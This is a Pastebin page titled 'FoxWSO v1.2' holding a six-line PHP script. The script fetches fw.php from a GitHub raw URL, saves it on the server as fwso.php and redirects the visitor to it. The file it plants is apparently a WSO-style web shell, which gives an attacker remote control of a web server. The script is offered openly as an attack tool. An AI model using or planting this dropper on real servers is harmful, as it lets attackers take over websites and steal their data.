Advertisement
willysec_id

FoxWSO v1.2

May 12th, 2022
1,466
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 0.29 KB | None | 0 0
  1. <?php
  2. //WillyGoID, 13 Mei 2022
  3. $content = "https://raw.githubusercontent.com/willygoid/foxwso/main/fw.php";
  4. $get_content = file_get_contents($content);
  5. if(file_exists("fwso.php")){header("location: fwso.php");}else{file_put_contents("fwso.php", $get_content); header("location: fwso.php");}
  6. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement